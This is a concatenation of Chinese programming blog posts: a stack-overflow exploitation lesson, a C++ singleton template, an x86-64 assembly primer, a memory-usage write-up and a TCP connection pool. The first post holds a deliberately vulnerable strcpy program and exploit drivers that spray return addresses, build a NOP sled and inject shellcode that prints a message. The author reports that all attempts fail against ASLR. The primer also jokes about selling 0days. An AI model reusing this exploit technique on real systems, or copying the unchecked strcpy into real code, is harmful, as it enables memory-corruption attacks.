Handbook](https://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X)。 95 | 96 | ### 结语 97 |   没点关注的点一波关注,谢谢!Have Fun!See You! 98 | -------------------------------------------------------------------------------- /bug-hunter-stackoverflow4.md: -------------------------------------------------------------------------------- 1 | [Bug Hunter]关于stack overflow Lesson III 2 | ========================================== 3 | 4 | ### 本篇意在澄清利用stackoverflow的bug来执行shellcode的可行性 5 |   在前面的博客里我提到过“会给出将stackoverflow的bug和shellcode结合起来的博文”,就我目前的知识水平来说,暂时我还做不到这一点。下面澄清一下做不到的原因:   6 | 7 |   请参考[Address space layout randomization (ASLR)](https://en.wikipedia.org/wiki/Address_space_layout_randomization),也就是程序运行时,Stack的起始地址对于最高分配给进程的Virtual Memory的值来说,有一个随机的offset,而且每次不同,也很难预测。下面是一个简易的测试程序: 8 | ```cpp 9 | #include 10 | #include 11 | 12 | int main(int argc, char **argv) { 13 | printf("%s is at %p\n", argv[1], getenv(argv[1])); 14 | 15 | return 0; 16 | } 17 | ``` 18 |   程序启动的时候,会将所有的环境变量存到Stack上,运行本例子多次,你会发现每次的结果都不一样,而且差距非常大。如图:   19 | 20 |    21 | 22 | ### 含有stackoverflow的例子程序 23 | ```cpp 24 | #include 25 | #include 26 | 27 | int main(int argc, char **argv) { 28 | char buffer[100]; 29 | strcpy(buffer, argv[1]); 30 | printf("%s\n", buffer); 31 | 32 | return 0; 33 | } 34 | ``` 35 | 36 | ### 尝试一 37 | ```cpp 38 | #include 39 | #include 40 | #include 41 | 42 | const char shellcode[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x68\x61\x63\x6b\x69\x6e\x67\x20\x77\x6f\x72\x6c\x64\x0a"; 43 | 44 | int main(int argc, char **argv) { 45 | unsigned int i, *ptr, ret, offset = 377; 46 | char *command, *buffer; 47 | command = (char *)malloc(200); 48 | memset(command, 0, 200); 49 | 50 | strcpy(command, "./overflow_shellcode \'"); 51 | buffer = command + strlen(command); 52 | 53 | if (argc > 1) 54 | offset = atoi(argv[1]); 55 | 56 | ret = (unsigned int)&i - offset; 57 | 58 | for (i = 0; i < 160; i += 4) 59 | *((unsigned int *)(buffer + i)) = ret; 60 | memset(buffer, 0x90, 60); 61 | memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1); 62 | strcat(command, "\'"); 63 | 64 | system(command); 65 | free(command); 66 | 67 | return 0; 68 | } 69 | ``` 70 |   显然,本例子成功执行的前提是`fork`的进程和父进程共享一个Stack Base,经测试,显然并不是共享一个Stack Base,新进程有自己随机的Stack Base。 71 | 72 | ### 尝试二 73 |   将SHELLCODE写到环境变量里去,然后添加非常多的`0x90`即`nop`指令,然后猜测SHEllCODE在Stack上的地址,很显然,失败。 74 | 75 | ### 尝试三 76 | ```cpp 77 | #include 78 | #include 79 | #include 80 | #include 81 | #include 82 | 83 | int main(int argc, char **argv) { 84 | char *env = getenv("SHELLCODE"); 85 | uint64_t i, ret; 86 | ret = uint64_t(env); 87 | //printf("%c\n", env[0]); 88 | printf("%p\n", ret); 89 | char *buffer = (char *)malloc(160); 90 | for (i = 0; i < 160; i += 8) 91 | *((uint64_t *)(buffer + i)) = ret; 92 | 93 | execle("./overflow_shellcode", "overflow_shellcode", buffer, 0); 94 | printf("%p\n", ret); 95 | 96 | free(buffer); 97 | 98 | return 0; 99 | } 100 | ``` 101 |   不调用`fork`,直接调用`execl`系列函数,测试再次失败,原因很简单,`execl`系列函数会替换当前进程上下文,包括栈,天知道替换之后的栈是哪样的,应该会有一个新的栈偏移,不然本例会成功的。 102 | 103 | ### 小结 104 |   综上所诉,目前就博主的水平来说,搞不定这个随机栈偏移的问题,当然还是有方法的,只不过博主目前不会,毕竟菜鸡博主。 :-)   105 | 106 |   **Good Luck, Have Fun!!!!!!!!** 107 | -------------------------------------------------------------------------------- /c++-template-singleton.md: -------------------------------------------------------------------------------- 1 | Simple C++ Template Singleton Class 2 | =================================== 3 | 4 | ## 起源 5 |   原始纯C时代,要引用一个全局的变量,大家习惯的用法是用`extern`,但是当这种全局变量太多了,写起代码来就得四处去找这种全局变量在哪儿定义的,对于C来说,`struct`里的所有成员都是默认公有属性,所以没有singleton这个概念。转而到Dual C/C++时代,针对`extern`的解决方案就是使用singleton,但是每个类都实现为Singleton未免太过麻烦,而且,有时候需要用Singleton,有时候不需要用Singleton的时候,这么写局限性太大。 6 | 7 | ## Note 8 |   为什么是Simple,因为本例子是非线程安全的,而且真正做到singleton的线程安全还有性能问题远不止加锁那么简单的事,还得考虑到编译器优化的问题,具体细节可以参考DCLP(Double-Check Locking Pattern)[here](http://www.aristeia.com/Papers/DDJ_Jul_Aug_2004_revised.pdf). 9 | 10 | ## 源码 11 | [class_templates.h](https://github.com/linghuazaii/C--Templates/blob/master/classes/class_templates.h) 12 | ```c++ 13 | #ifndef _CLASS_TEMPLATES_H 14 | #define _CLASS_TEMPLATES_H 15 | /* 16 | * File: class_templates.h 17 | * Author: Charles, Liu. 18 | */ 19 | 20 | template 21 | class Singleton { 22 | public: 23 | static T *instance(); 24 | static void destroy(); 25 | private: 26 | Singleton(); 27 | ~Singleton(); 28 | private: 29 | static T *_instance; 30 | }; 31 | 32 | template 33 | T *Singleton::_instance = NULL; 34 | 35 | template 36 | T *Singleton::instance() { 37 | if (_instance == NULL) { 38 | _instance = new T; 39 | } 40 | 41 | return _instance; 42 | } 43 | 44 | template 45 | void Singleton::destroy() { 46 | if (_instance != NULL) 47 | delete _instance; 48 | } 49 | 50 | template 51 | Singleton::Singleton() { 52 | } 53 | 54 | template 55 | Singleton::~Singleton() { 56 | } 57 | 58 | #endif 59 | ``` 60 | [myclass.h](https://github.com/linghuazaii/C--Templates/blob/master/classes/myclass.h) 61 | ```c++ 62 | #ifndef _MY_CLASS_H 63 | #define _MY_CLASS_H 64 | /* 65 | * File: myclass.h 66 | * Author: Charles, Liu. 67 | */ 68 | #include 69 | using namespace std; 70 | 71 | class MyClass { 72 | public: 73 | MyClass(){} 74 | ~MyClass(){} 75 | const char *print() { 76 | return "calling MyClass::print"; 77 | } 78 | }; 79 | 80 | #endif 81 | ``` 82 | [main.cpp](https://github.com/linghuazaii/C--Templates/blob/master/classes/main.cpp) 83 | ```c++ 84 | #include 85 | #include "class_templates.h" 86 | #include "myclass.h" 87 | using namespace std; 88 | /* 89 | * For TESTING, have fun!!! 90 | */ 91 | 92 | const char *test_info = NULL; 93 | 94 | #define INFO(msg) do { \ 95 | test_info = msg; \ 96 | cout << "============== " << test_info << " ==============" << endl; \ 97 | } while (0) 98 | #define END() cout << "============== "<< "END" << " ==============" << endl 99 | #define TEST2(function, a, b) do {\ 100 | INFO("TEST "#function);\ 101 | cout << #function << "(" << a << "," << b << ")" <::instance(); 116 | TEST(single_test->print); 117 | 118 | MyClass *addr1 = Singleton::instance(); 119 | MyClass *addr2 = Singleton::instance(); 120 | cout<<"addr1: "<(addr1)<(addr2)< 12 |
13 |   我来一个个解释哈,后面我会直接上一个x86-64汇编版本的Hello World。现在的内存模型,早已不是远古时期DOS时代的真实地址模型了,virtual memory,也就是每个程序先给你一个4G的Sandbox玩,寄存器里存的各个段的地址都是偏移地址,真实地址CPU会帮我们算出来。而且呢,程序的起始偏移地址并不是0x00000000,而是0x400000,这段内存里存的是标准库的一些信息,我们不用理她。程序呢,是一段一段组成的,data段啊,text段啊,bss段啊,各种SS,DS,CS,ES,FS,GS寄存器就是存一个段起始值,然后SP,DI,SI啊可以存一个偏移,如图中DS:SI就指向了一个具体的地址。现在我只需要向你强调一件事:地址这个东西非常非常重要,它是程序跑起来的核心! 14 | 15 | ### 那些逗逼寄存器们 16 |    17 |
18 |   eax,ebx,ecx,edx这几个是通用的,32位,去掉e,例如ax就是16位,ah或者al就是高八位和低八位,esi,edi,esp,ebp没八位那一说,用法看CPU喜好。CS即Code Segment,DS即Data Segment,SS即Stack Segment,ES,FS,GS是扩展用的,因为可能不止一个段,而且一条指令可能需要多个数据段的数据,所以这几个是扩展用的。EFLAGS这是是存CPU状态的,像什么溢出啊之类的。最经典的EIP/RIP,这个大妹子可厉害了,存的是下一条指令的地址。先恭喜一下360安全团队夺取本届Pwn2Own世界冠军。如果你能够找到一个程序的漏洞,并且这个漏洞可以用来获得EIP/RIP控制权,那么你就可以执行任意代码,随意更改代码逻辑,如果你发现知名厂商有这种漏洞的话,那么恭喜你,0day漏洞,拿去卖吧,买房不是梦~寄存器就是这样的,我知道你还没听懂,没关系,下面我们来干活,抄起键盘就是干~ 19 | 20 | ### x86-64版本Hello World 21 | ``` 22 | ; This file is auto-generated.Edit it at your own peril. 23 | section .data 24 | msg: db "Hello World!",10 25 | msglen: equ $-msg 26 | 27 | section .text 28 | 29 | global _start 30 | _start: 31 | nop ; make gdb happy 32 | ; put your experiments between these nop 33 | mov eax,1 34 | mov edi,1 35 | mov esi,msg 36 | mov edx,msglen 37 | syscall 38 | ; put your expeirments between these nop 39 | nop ; make gdb happy 40 | 41 | ; exit 42 | mov eax,60 ; system call 60: exit 43 | xor edi, edi ; set exit status to zero 44 | syscall ; call the operating system 45 | 46 | section .bss 47 | ``` 48 |   出家人不打诳语,你看你看,`.data`段,存了一个`msg`变量,以及`msglen`,就是已经初始化的全局变量,所谓的静态存储区,`.text`段存的是代码,`_start`就是程序的起始地址,你会发现c程序的symbol table里面也有个`_start`符号。
49 |    50 |
51 |   这里我就直接上指令了,`mov eax, 1`表示我们要调用`sys_write`,`mov edi,1`表示我们要写描述符1,即`stdout`,`mov edi,msg`表示传入要写内容的地址,`mov edx,msglen`表示传入消息长度,然后`syscall`中断,让操作系统干事去。你仔细看,其实这段汇编完全遵循着intel x86的指令集表,是不是?你现在在把前面指令集啊,寄存器啊啥的联系起来想一想,程序其实就是这么回事儿。然后后端就是调用退出指令:
52 |    53 |
54 |   我没骗你吧,遵循着那张指令集表呢。如果你翻过Linux内核源码你就会发现很多`_sys`打头的函数,看看那堆乱七八糟的宏定义~ 55 |
56 |   `nasm -f elf64 -g -F stabs test.asm -o test.o`,然后`ld test.o -o test`。让我们调试一下:`gdb -tui test` 57 |
58 |    59 |
60 |   操作细节我就不写了,你自己慢慢玩嘛,看看寄存器的变化啥的。然后我们看看symbol table,`readelf -s test`
61 | ``` 62 | Symbol table '.symtab' contains 12 entries: 63 | Num: Value Size Type Bind Vis Ndx Name 64 | 0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND 65 | 1: 00000000004000b0 0 SECTION LOCAL DEFAULT 1 66 | 2: 00000000006000d4 0 SECTION LOCAL DEFAULT 2 67 | 3: 0000000000000000 0 SECTION LOCAL DEFAULT 3 68 | 4: 0000000000000000 0 SECTION LOCAL DEFAULT 4 69 | 5: 0000000000000000 0 FILE LOCAL DEFAULT ABS 002.asm 70 | 6: 00000000006000d4 1 OBJECT LOCAL DEFAULT 2 msg 71 | 7: 000000000000000d 0 NOTYPE LOCAL DEFAULT ABS msglen 72 | 8: 00000000004000b0 0 NOTYPE GLOBAL DEFAULT 1 _start 73 | 9: 00000000006000e1 0 NOTYPE GLOBAL DEFAULT 2 __bss_start 74 | 10: 00000000006000e1 0 NOTYPE GLOBAL DEFAULT 2 _edata 75 | 11: 00000000006000e8 0 NOTYPE GLOBAL DEFAULT 2 _end 76 | ``` 77 |
78 |   然后我们再反编译一下对比一下,`objdump -S --disassemble test`
79 |    80 |
81 |   和汇编版本差别不大是不是,但是对于C来说可就大了去了~ 82 |
83 | 84 | ### C语言版本Hello World 85 | 86 | ``` 87 | #include 88 | int main(int argc, char **argv) { 89 | printf("Hello World!"); 90 | 91 | return 0; 92 | } 93 | ``` 94 |
95 |   C语言版本够简单把,才这几行~ 我们看看符号表,`readelf -s a.out` 96 |
97 |    98 |
99 |   这符号表是不是复杂多了,但是`_start`入口还是一样会有,当然也少不了`main`啦,让我们调试一下`gdb -tui a.out`
100 |    101 |
102 |   从`_start`开始会调到`__libc_start_main@plt`,关于plt我这里要唠叨两句,如果你写过插件化的架构或者其他的东西肯定会用到`dlopen`,这又要扯到什么链接装载与库,什么乱七八糟的东西,我不想扯。连接器将一堆.o链接成一个可执行文件的时候就是找符号,没有的就向后找,凡是使用到的都去找,第一个找到的扔进plt表,如果一个都找不到那么就出现`Undefined Reference`错误。看上边的符号表里也有`__libc_start_main`,对吧,联系起来了吧。然后我们继续调试会发现函数调用次序是这样的`printf@plt` => `vfprintf` => `strchrnul`,反正具体什么玩意我也不是很懂,毕竟我也是个Newbie。到这里呢,如果你也是跟着我一起gdb了,你会发现,一些都是地址,地址指向代码段,数据段,然后整到寄存器里,然后送到CPU,CPU把一切都搞定了,程序就跑起来啦。 103 |
104 |   让我们反编译一下a.out看看是些什么鬼东西把~ `objdump -S --disassemble a.out`,汇编指令我就省略掉大部分 105 |
106 |    107 |   你发现了吗,符号表里的symbol对应着段,段对应着一个起始地址,起始地址之后是一段汇编代码,一切的一切在这里都联系起来了吧,一切的一切都是地址,给我地址我就能拿到所有能拿到的东西。 108 | 109 | ### 小结 110 |   小结个屁,这都晚上12:30了,看了这么久,给你们出个简单的小题目,看你们看懂了没:
111 |   我现在有两个库a.so和b.so,两个库里面都有一个print 函数,a.so里输出A,b.so里输出B,然后我有一个主程序文件main.c,
112 |   如果我`gcc -L. main.c -o test -la -lb`,运行程序输出啥?
113 |   如果我`gcc -L. main.c -o test -lb -la`,运行程序输出啥?
114 |   欢迎评论,就算你评论了,我也不会理你的~
115 |   **GLHF~** 116 | -------------------------------------------------------------------------------- /decrease-resident-memory.md: -------------------------------------------------------------------------------- 1 | ## 问题描述 2 |   新闻推荐`server`内存占用率过高,每个新闻`item`占用内存54K,为了避免造成过多内存碎片和提升性能,使用了内存池。该内存池结构:一个链表连接每个`block`,每个`block`初始为1000个`item`,即每个`block`占用54M内存。然后从数据库load数据,大概生成60000个`item`,也就是大约3G的内存,然后两个内存池,用来做reload数据并指针置换,这样占用内存达6G。内存池使用`calloc`申请内存,底层调用`mmap`,费用有些高,所以一次尽量多申请些内存。为什么用`calloc`,而不用`malloc + memset`,因为后者必然会占用6G内存,`calloc`首先避免了重复的`memset`调用,其次也优化了内存申请逻辑,即申请3G内存,其实并没有真实的占有3G内存,只是拿到了系统发的保证书,意思就是要的时候再给你。其实就是,写内存的时候才会触发`PAGE FAULT`,进而触发`PAGE SWAP`,申请真实的RAM。那么问题出现了,内存池使用的是`calloc`,理论上根本不会占用6G内存,为什么呢?(以上所说内存都是指`top`显示的`RES`内存,即resident memory,不是virtual memory,不知道两者区别可以先去做做功课) 3 | 4 | ## 看以下例子并回答我的问题 5 | 6 | ### struct article_item 7 | ``` 8 | #define MAX_CONTENT_LEN 51200 9 | 10 | #pragma pack(1) /* 不推荐1字节对齐,这样会损耗性能,正确写法应该是把按宽度降序排列 */ 11 | typedef struct article_item{ 12 | uint32_t create_time; 13 | uint32_t modify_time; 14 | uint32_t public_time; 15 | uint64_t source_id; 16 | uint64_t item_id; 17 | uint64_t group_id; 18 | uint16_t type; 19 | uint16_t duration; 20 | char video[512]; 21 | char original_video[512]; 22 | char original_thumbnails[512]; 23 | char category[32]; 24 | char data_type[32]; 25 | char url_source[32]; 26 | char source[32]; 27 | char title[256]; 28 | char content[MAX_CONTENT_LEN]; 29 | char url[512]; 30 | char thumbnails[512]; 31 | char url_target[512]; 32 | char extra[1024]; 33 | } article_item; 34 | #pragma pack() 35 | ``` 36 | 笔者推荐结构体写法: 37 | ``` 38 | #define MAX_CONTENT_LEN 51200 39 | 40 | typedef struct article_item{ 41 | uint64_t source_id; 42 | uint64_t item_id; 43 | uint64_t group_id; 44 | uint32_t create_time; 45 | uint32_t modify_time; 46 | uint32_t public_time; 47 | uint16_t type; 48 | uint16_t duration; 49 | char video[512]; 50 | char original_video[512]; 51 | char original_thumbnails[512]; 52 | char category[32]; 53 | char data_type[32]; 54 | char url_source[32]; 55 | char source[32]; 56 | char title[256]; 57 | char content[MAX_CONTENT_LEN]; 58 | char url[512]; 59 | char thumbnails[512]; 60 | char url_target[512]; 61 | char extra[1024]; 62 | } article_item; 63 | ``` 64 | 65 | ### Version A 66 | ``` 67 | int main(int argc, char **argv) { 68 | cout<= n) { 123 | memmove(dest, src, n); 124 | } else { 125 | memmove(dest, src, strlen(src)); 126 | dest[strlen(src)] = 0; 127 | } 128 | 129 | return dest; 130 | } 131 | ``` 132 | 133 | ## 结语 134 | 好想进BAT…… 135 | -------------------------------------------------------------------------------- /how-to-write-a-self-repair-tcp-pool.md: -------------------------------------------------------------------------------- 1 | 怎样写一个自修复的TCP连接池 2 | =========================== 3 | 4 | ### 原料 5 |   epoll, threadpool, pthread 6 | 7 | ### 构图 8 |   首先,我们怎么定义一个socket连接?其一当然是socket file descriptor;其二就是关于socket的一些设置选项,像`TCP_NODELAY`, `TCP_CORK`, `SOCK_NONBLOCK`, `TCP_KEEPALIVE`等等;其三,socket可能由于server crash或者一段时间闲置被server close,或者其他原因导致其失效,所以需要一个选项保存socket的状态;其四,这个socket是所有线程共享的,这里的共享是指socket被某一个thread里拿出来,可能因为失效,另一个做修复的thread正在修复这个socket连接。由于在连接失效时才修复连接并更改连接是否可用的选项,而且每次从池子拿连接都得判断连接是否可用,所以需要一把读写锁,因为写得少读的多嘛;其五,设置一个额外的字段留着备用。结构如下: 9 | ```c 10 | typedef struct tcp_connection_t { 11 | int fd; 12 | int flags; 13 | bool valid; 14 | pthread_rwlock_t rwlock; 15 | void *extra; 16 | } tcp_connection_t; 17 | ``` 18 |   其次,一个连接池需要哪些东西呢?其一,需要一个大池子`vector pool`存储所有的连接信息;其二,需要一个队列存储可用的连接`queue ready_pool`;其三,这些池子是共享的,所以需要一把锁,一个条件变量去检测池子里是否有连接可用;其四,池子对外接口只需要`initPool()`, `getConnection()`, `putConnection()`;其五,需要一些额外的信息保存server信息以及池子信息。类声明如下: 19 | ```c 20 | class CharlesTcpPool { 21 | public: 22 | CharlesTcpPool(const char *ip, int port, int max_size = MAX_POOL_SIZE, int init_size = INIT_POOL_SIZE); 23 | ~CharlesTcpPool(); 24 | int initPool(int flags = CHARLES_OPTION_NONE); 25 | tcp_connection_t * newConnection(int flags = CHARLES_OPTION_NONE); 26 | /* flags is for newConnection when ready pool is empty but pool is not full */ 27 | tcp_connection_t * getConnection(int timeout /* milisecond */, int flags = CHARLES_OPTION_NONE); 28 | void putConnection(tcp_connection_t *connection); 29 | int setConfig(int sock, int flags); 30 | public: 31 | void watchPool(); 32 | void repairConnection(tcp_connection_t *connection); 33 | private: 34 | pthread_mutex_t mutex; 35 | pthread_cond_t cond; 36 | int max_pool_size; 37 | int init_pool_size; 38 | vector pool; 39 | queue ready_pool; 40 | threadpool_t *threadpool; 41 | int epollfd; 42 | char ip[IPLEN]; 43 | int port; 44 | bool running; 45 | }; 46 | ``` 47 |   然后,连接失效了我们怎么修呢?这里就需要用到`epoll`了,所有新建立的连接需要加到`epoll`里监控,只需要监控`EPOLLIN`,这里我们只能选择LT模式,因为ET模式只通知一次,为了避免数据丢失,只能选择LT模式。只要有`EPOLLIN`事件产生,就用`ioctl(fd, FIONREAD, &length)`检查一下socket可读的buffer大小,如果为`0`则表示server关闭了连接,需要我们修复。你可能会问:那buffer里有内容我一直没读怎么办?没关系,没读是你的事,等你读完了,对于该socket会一直有`EPOLLIN`事件产生,这里检查可读buffer大小依旧为`0`,此时连接才被判定为失效。一般server挂掉之后起来得花些时间,所以每一次重建连接失败的话会有一个等待延时,而且有一个重试次数,如果耗尽的话就等待下一次`epoll_wait`返回再试。这里其实可以稍微设计一下算法的,比如说每一次重建连接失败都会略微增加延时。其实也没有太大的必要,因为有延时后就减少了很大一部分CPU消耗了,可以忽略不计。 48 | 49 | ### 实现 50 |  初始化该初始化的东西。 51 | ```c 52 | CharlesTcpPool::CharlesTcpPool(const char *server_ip, int server_port, int max_size, int init_size) { 53 | strncpy(ip, server_ip, IPLEN); 54 | port = server_port; 55 | max_pool_size = max_size; 56 | init_pool_size = init_size; 57 | pthread_mutex_init(&mutex, NULL); 58 | pthread_cond_init(&cond, NULL); 59 | pool.reserve(max_size); 60 | } 61 | ``` 62 | 63 |  析构的时候还是加上锁吧,不然不知道会不会出什么幺蛾子。 64 | ```c 65 | CharlesTcpPool::~CharlesTcpPool() { 66 | // do clean 67 | pthread_mutex_lock(&mutex); 68 | for (int i = 0; i < pool.size(); ++i) { 69 | tcp_connection_t *connection = pool[i]; 70 | pthread_rwlock_wrlock(&connection->rwlock); 71 | charles_epoll_ctl(epollfd, EPOLL_CTL_DEL, connection->fd, NULL); 72 | close(connection->fd); 73 | connection->valid = false; 74 | pthread_rwlock_unlock(&connection->rwlock); 75 | pthread_rwlock_destroy(&connection->rwlock); 76 | delete connection; 77 | } 78 | running = false; 79 | ready_pool = queue(); 80 | pthread_mutex_unlock(&mutex); 81 | pthread_mutex_destroy(&mutex); 82 | pthread_cond_destroy(&cond); 83 | } 84 | ``` 85 | 86 |  `initPool()`实现,主要是新建一堆连接,启动后台的连接监测线程,还有连接修复线程池。 87 | ```c 88 | int CharlesTcpPool::initPool(int flags) { 89 | epollfd = charles_epoll_create(); 90 | if (epollfd == -1) 91 | return -1; 92 | threadpool = threadpool_create(THREADPOOL_SIZE, THREADPOOL_QUEUE_SIZE, 0); 93 | if (threadpool == NULL) 94 | return -1; 95 | 96 | for (int i = 0; i < init_pool_size; ++i) { 97 | tcp_connection_t *connection = newConnection(flags); 98 | if (connection == NULL) /* fail if can't create connection */ 99 | return -1; 100 | pool.push_back(connection); 101 | ready_pool.push(connection); 102 | } 103 | 104 | pthread_t watcher; 105 | pthread_attr_t watcher_attr; 106 | pthread_attr_init(&watcher_attr); 107 | pthread_attr_setdetachstate(&watcher_attr, PTHREAD_CREATE_DETACHED); 108 | pthread_create(&watcher, &watcher_attr, watch_pool, (void *)this); 109 | pthread_attr_destroy(&watcher_attr); 110 | 111 | return 0; 112 | } 113 | ``` 114 | 115 |  新建连接实现。 116 | ```c 117 | tcp_connection_t * CharlesTcpPool::newConnection(int flags) { 118 | tcp_connection_t *connection = new tcp_connection_t; 119 | connection->fd = charles_socket(AF_INET, SOCK_STREAM, 0); 120 | connection->flags = flags; 121 | connection->valid = true; 122 | connection->extra = (void *)this; 123 | pthread_rwlock_init(&connection->rwlock, NULL); 124 | struct sockaddr_in server; 125 | server.sin_family = AF_INET; 126 | server.sin_port = htons(port); 127 | charles_inet_aton(ip, &server.sin_addr); 128 | if (-1 == setConfig(connection->fd, flags)) { 129 | close(connection->fd); 130 | delete connection; 131 | return NULL; 132 | } 133 | if (-1 == charles_connect(connection->fd, (struct sockaddr *)&server, sizeof(server))) { 134 | close(connection->fd); 135 | delete connection; 136 | return NULL; 137 | } 138 | 139 | return connection; 140 | } 141 | ``` 142 | 143 |  `watch_pool`实现,就是为了回调进类里去。 144 | ```c 145 | /* call back into class */ 146 | void *watch_pool(void *arg) { 147 | CharlesTcpPool *pool = (CharlesTcpPool *)arg; 148 | pool->watchPool(); 149 | } 150 | ``` 151 | 152 |  `watchPool()`后台监测连接线程函数实现。这里为了安全起见还是先上个锁,因为本线程启动之前可能有其他线程已经在使用池子了。所有初始的连接都加入到`epoll`里去监听,如果收到`EPOLLIN`事件并且可读buffer大小为`0`,则先将其从`epoll`监听里拿掉,送到连接修复线程池里去修复。 153 | ```c 154 | void CharlesTcpPool::watchPool() { 155 | pthread_mutex_lock(&mutex); 156 | for (int i = 0; i < init_pool_size; ++i) { 157 | struct epoll_event event; 158 | event.events = EPOLLIN; 159 | event.data.ptr = (void *)pool[i]; 160 | charles_epoll_ctl(epollfd, EPOLL_CTL_ADD, pool[i]->fd, &event); 161 | } 162 | pthread_mutex_unlock(&mutex); 163 | running = true; 164 | struct epoll_event events[max_pool_size]; 165 | while (running) { 166 | int nfds = charles_epoll_wait(epollfd, events, max_pool_size); 167 | if (nfds == -1) 168 | continue; 169 | tcp_connection_t *connection; 170 | for (int i = 0; i < nfds; ++i) { 171 | connection = (tcp_connection_t *)events[i].data.ptr; 172 | if (events[i].events & EPOLLIN) { 173 | if (0 == get_socket_read_buffer_length(connection->fd)) { 174 | pthread_rwlock_wrlock(&connection->rwlock); 175 | connection->valid = false; 176 | pthread_rwlock_unlock(&connection->rwlock); 177 | /* remove from epoll event */ 178 | charles_epoll_ctl(epollfd, EPOLL_CTL_DEL, connection->fd, NULL); 179 | threadpool_add(threadpool, repair_connection, (void *)connection, 0); 180 | } 181 | } 182 | } 183 | } 184 | } 185 | ``` 186 | 187 |  `repair_connection()`连接修复函数实现,就是为了回调进类里面去。 188 | ```c 189 | /* call back into class */ 190 | void repair_connection(void *arg) { 191 | tcp_connection_t *connection = (tcp_connection_t *)arg; 192 | CharlesTcpPool *pool = (CharlesTcpPool *)connection->extra; 193 | pool->repairConnection(connection); 194 | } 195 | ``` 196 | 197 |  `repairConnection()`实现,先备份下失效连接的`fd`,因为后续可能需要将其再次加入到`epoll`监听,避免将其意外关闭导致永久丢失该连接的监听。如果成功建立连接则将连接状态置为有效并关闭备份连接,完了无论是否成功建立连接,都需要将该连接重新加入到`epoll`监听等待下一次`epoll_wait`返回。 198 | ```c 199 | void CharlesTcpPool::repairConnection(tcp_connection_t *connection) { 200 | /* I must backup this fd, can't close it, it must remains a valid file descriptor */ 201 | int backup = connection->fd; 202 | int count = 0; 203 | for (; count < RETRY_COUNT; ++count) { 204 | connection->fd = charles_socket(AF_INET, SOCK_STREAM, 0); 205 | struct sockaddr_in server; 206 | server.sin_family = AF_INET; 207 | server.sin_port = htons(port); 208 | charles_inet_aton(ip, &server.sin_addr); 209 | if (-1 == setConfig(connection->fd, connection->flags)) { 210 | close(connection->fd); 211 | usleep(RETRY_PERIOD * 1000); 212 | continue; 213 | } 214 | if (-1 == charles_connect(connection->fd, (struct sockaddr *)&server, sizeof(server))) { 215 | close(connection->fd); 216 | usleep(RETRY_PERIOD * 1000); 217 | continue; 218 | } 219 | /* get a good connection */ 220 | pthread_rwlock_wrlock(&connection->rwlock); 221 | connection->valid = true; 222 | close(backup); /* close backup if we new connection successfully */ 223 | pthread_rwlock_unlock(&connection->rwlock); 224 | break; 225 | } 226 | /* add to epoll event even if this connection is not repaired, wait for next time repair */ 227 | struct epoll_event event; 228 | event.events = EPOLLIN; 229 | if (count == RETRY_COUNT) { /* failed, add original fd to epoll events */ 230 | connection->fd = backup; 231 | } 232 | event.data.ptr = connection; 233 | charles_epoll_ctl(epollfd, EPOLL_CTL_ADD, connection->fd, &event); 234 | } 235 | ``` 236 | 237 |  逻辑最复杂的`getConnection()`实现,先记录一个`start_time`,如果可用的池子空了并且连接池已满,那么就等待连接可用直到`timeout`。否则,如果可用池子空了但是连接池未满,则新建一个连接返回并将其加入到连接池,但是并不加入到可用连接池,因为用完后会还给可用连接池。如果可用连接池不为空,则循环最多`max_pool_size`次数从可用连接池里拿连接直到`timeout`或者所有连接都不可用。这里为什么用`max_pool_size`而不是`read_pool.size()`,因为不仅`read_pool.size()`是动态可变的而且新建的连接可能和失效的连接可能是穿插的,有点绕,好好想一下。`max_pool_size`确保了所有连接都过了一遍,即使有的连接被过了多次也无所谓,因为连接池不会非常巨大,所以暂不考虑算法层面上的优化。 238 | ```c 239 | tcp_connection_t *CharlesTcpPool::getConnection(int timeout /* milisecond */, int flags) { 240 | struct timespec ts; 241 | ts.tv_sec = timeout / 1000; 242 | ts.tv_nsec = (timeout % 1000) * 1000 * 1000; 243 | struct timespec start_time, end_time; 244 | clock_gettime(CLOCK_MONOTONIC_COARSE, &start_time); 245 | pthread_mutex_lock(&mutex); 246 | while (ready_pool.empty() && pool.size() == max_pool_size) { 247 | int ret = pthread_cond_timedwait(&cond, &mutex, &ts); 248 | if (ret == ETIMEDOUT) { 249 | pthread_mutex_unlock(&mutex); 250 | return NULL; 251 | } 252 | } 253 | if (ready_pool.empty()) { 254 | tcp_connection_t *connection = newConnection(flags); 255 | if (connection == NULL) { 256 | pthread_mutex_unlock(&mutex); 257 | return NULL; 258 | } 259 | pool.push_back(connection); 260 | pthread_mutex_unlock(&mutex); 261 | return connection; 262 | } else { 263 | for (int count = 0; count < max_pool_size; ++count) { 264 | tcp_connection_t *connection = ready_pool.front(); 265 | ready_pool.pop(); 266 | int valid; 267 | pthread_rwlock_rdlock(&connection->rwlock); 268 | valid = connection->valid; 269 | pthread_rwlock_unlock(&connection->rwlock); 270 | if (valid == false) { 271 | ready_pool.push(connection); 272 | clock_gettime(CLOCK_MONOTONIC_COARSE, &end_time); 273 | int period = (end_time.tv_sec * 1000 + end_time.tv_nsec / 1000000) - (start_time.tv_sec * 1000 + start_time.tv_nsec / 1000000); 274 | if (period >= timeout) { 275 | pthread_mutex_unlock(&mutex); 276 | return NULL; 277 | } 278 | } else { 279 | pthread_mutex_unlock(&mutex); 280 | return connection; 281 | } 282 | } 283 | /* at last, all connection is failed */ 284 | pthread_mutex_unlock(&mutex); 285 | return NULL; 286 | } 287 | } 288 | ``` 289 | 290 |  `putConnection()`实现,还给池子,broadcast给所有线程,池子里有可用连接啦。 291 | ```c 292 | void CharlesTcpPool::putConnection(tcp_connection_t *connection) { 293 | pthread_mutex_lock(&mutex); 294 | ready_pool.push(connection); 295 | pthread_cond_broadcast(&cond); 296 | pthread_mutex_unlock(&mutex); 297 | } 298 | ``` 299 | 300 |   还有一些其他函数即细节没有一一罗列,所有代码请见[Charles TCP Pool](https://github.com/linghuazaii/Charles-TcpPool) 301 | 302 | ### 小结 303 |   **GOOD LUCK, HAVE FUN!** 304 | -------------------------------------------------------------------------------- /how-to-write-a-tcp-server.md: -------------------------------------------------------------------------------- 1 